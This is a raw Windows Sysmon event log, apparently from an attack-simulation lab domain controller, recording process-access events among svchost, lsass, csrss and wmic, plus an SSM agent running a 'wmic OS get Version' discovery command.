13:53:21.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001626Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001625Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001624Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.683{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001623Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.683{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001622Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.682{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001621Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.682{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001620Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.682{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001619Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.682{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001618Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.682{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001617Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.682{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001616Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.682{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001615Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.676{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-3900-000000009101}3800C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001614Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.676{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8551-5FCF-3900-000000009101}3800C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001613Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.673{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3900-000000009101}3800C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001612Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.660{10ACEC4A-8551-5FCF-3A00-000000009101}38083828C:\Windows\system32\conhost.exe{10ACEC4A-8551-5FCF-3900-000000009101}3800C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001611Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.655{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3A00-000000009101}3808C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001610Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.651{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3900-000000009101}3800C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001609Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.651{10ACEC4A-8551-5FCF-3000-000000009101}15483772C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{10ACEC4A-8551-5FCF-3900-000000009101}3800C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000001608Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.641{10ACEC4A-8551-5FCF-3900-000000009101}3800C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get Version /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000001607Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001606Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001605Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001604Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001603Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001602Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001601Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.648{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYS